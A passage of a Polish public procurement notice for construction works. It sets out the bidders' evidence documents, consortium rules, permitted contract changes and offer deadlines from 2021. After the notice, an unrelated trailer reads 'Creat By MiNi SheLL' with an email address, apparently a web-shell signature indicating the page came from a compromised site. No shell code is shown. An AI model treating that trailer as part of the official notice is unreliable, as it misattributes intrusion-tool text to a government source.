działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór Załącznik nr 5 do SWZ)<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór Załącznik nr 6 do SWZ),<br/>c) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub<br/>kadry kierowniczej wykonawcy potwierdzające że osoby które będą uczestniczyć<br/>w wykonywaniu zamówienia, posiadają wymagane uprawnienia, (wzór stanowi<br/>Załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia i dokumenty, jakie zobowiązani są dostarczyć wykonawcy w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu oraz wykazania braku podstaw<br/>wykluczenia (podmiotowe środki dowodowe).<br/>1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia wg wzoru<br/>stanowiącego Załącznik nr 2 do SWZ.<br/>a Oferta oraz oświadczenia Wykonawców o niepodleganiu wykluczeniu oraz<br/>spełnieniu przez nich warunków udziału w postępowaniu będą składane pod rygorem nieważności w<br/>formie elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym(art.63 ust.2 pzp) w tym<br/>kwalifikowany podpis elektroniczny.<br/>Zgodnie z art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, podpis zaufany to podpis elektroniczny, którego autentyczność i<br/>integralność są zapewniane przy użyciu pieczęci elektronicznej ministra właściwego do spraw<br/>informatyzacji, zawierający dane identyfikujące osobę tj. imię (imiona), nazwisko, PESEL,<br/>ustalone na podstawie środka identyfikacji elektronicznej, identyfikator środka identyfikacji<br/>elektronicznej, przy użyciu którego został złożony, czas jego złożenia.<br/>Zgodnie z art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych podpis osobisty to<br/>zaawansowany podpis elektroniczny w rozumieniu art. 3 pkt 11 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) nr 910/2014 z 23 lipca 2014 r. w sprawie identyfikacji elektronicznej i usług<br/>zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylającego<br/>dyrektywę 1999/93/WE, weryfikowany za pomocą certyfikatu podpisu osobistego.<br/>b Oświadczenie składają odrębnie:<br/>- wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu;<br/>- podmiot trzeci, na którego potencjał powołuje się wykonawca celem<br/>potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy;<br/>- podwykonawcy, na których zasobach wykonawca nie polega przy wykazywaniu<br/>spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie<br/>potwierdza brak podstaw wykluczenia podwykonawcy (jeżeli zamawiający weryfikuje<br/>podstawy wykluczenia w odniesieniu do podwykonawcy).<br/>2. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>podmiotowych środków dowodowych:<br/>1) Spełnianie warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty (wzór Załącznik nr 5 do<br/>SWZ)<br/>Pozostała część dostępna w SWZ w dziale VII OŚWIADCZENIA I DOKUMENTY.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>1) Wykonawcy mogą wspólnie (konsorcjum, spółka cywilna) ubiegać się o udzielenie<br/>zamówienia, wtedy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy sprawie<br/>zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty.<br/>2) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>oświadczenie, o którym mowa w punkcie VII SWZ, składa każdy z wykonawców.<br/>3) Jeżeli zostanie wybrana oferta wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>umowy regulującej współpracę tych wykonawców.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie według załącznika nr 4 do SWZ, z którego powinno wynikać, które roboty<br/>budowlane lub usługi wykonają poszczególni wykonawcy.<br/>5) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy stanowią Załącznik nr 7 do SWZ. Zmiany umowy możliwe<br/>zgodnie z przewidzianymi okolicznościami w ustawie Prawo zamówień publicznych oraz zgodnie<br/>ze wskazanymi okolicznościami w postanowieniach umownych - Zmiany Umowy.<br/>Zmiany Umowy<br/>1. Oprócz przypadków, o których mowa w art. 454 ust. 2 pkt 1-4 ustawy – Prawo zamówień<br/>publicznych, na podstawie art. 455 ust. 1 pkt 1 ustawy – Prawo zamówień publicznych,<br/>Zamawiający dopuszcza możliwość wprowadzania zmiany Umowy<br/>w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,<br/>w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania Umowy<br/>lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>6.1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia<br/>niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu<br/>wejścia w życie Umowy, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni, odpowiadającą okresowi występowania okoliczności siły wyższej, przez siłę wyższą strony<br/>rozumieją również zaistnienie warunków atmosferycznych uniemożliwiających wykonanie<br/>przedmiotu umowy zgodnie ze sztuką budowlaną,<br/>6.2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania<br/>robót budowlanych, stanowiących Przedmiot zamówienia lub wydania zakazu prowadzenia robót<br/>budowlanych, stanowiących Przedmiot zamówienia przez organ administracji publicznej, o ile<br/>żądanie lub wydanie zakazu nie nastąpiło<br/>z przyczyn za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu<br/>realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy<br/>nakazano<br/>wstrzymanie robót budowlanych lub zakazano prowadzenie robót budowlanych,<br/>6.3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia kolizji z sieciami zewnętrznymi lub instalacjami nieujawnionymi w<br/>dokumentacji projektowej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni niezbędną Wykonawcy na usunięcie kolizji z sieciami zewnętrznymi lub instalacjami<br/>nieujawnionymi w dokumentacji projektowej – o ile usunięcie kolizji wymagać będzie<br/>przedłużenia terminu realizacji;<br/>6.4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2, może nastąpić w<br/>przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian,<br/>powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot<br/>zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni<br/>niezbędną<br/>do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzenia uzgodnień<br/>(ustaleń) z właściwymi organami, uzyskania opinii właściwych organów oraz wydania decyzji<br/>przez właściwe organy, przy czym wprowadzenie w dokumentacji projektowej zmian nie może<br/>skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie, oraz<br/>zwiększeniem wynagrodzenia Wykonawcy,<br/>6.5) przedłużenia terminu wykonania w zakresie niezbędnym wynikającym z konieczności<br/>wykonania robót,<br/>6.6) Wystąpią nieprzewidziane okoliczności uniemożliwiające wykonania zadania<br/>w pierwotnie zakładany sposób (w tym termin) spowodowane bezpośrednio wystąpieniem<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>epidemii związanej z wirusem COVID-19.<br/><br/>Pozostałą część dostępna w załączniku nr 7 do SWZ par. 17. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokumentacja postępowania wraz z załącznikami jest dostępna pod adresem:<br/>https://www.powiatjedrzejow.pl/bipkod/012/003/004/003

Creat By MiNi SheLL
Email: jattceo@gmail.com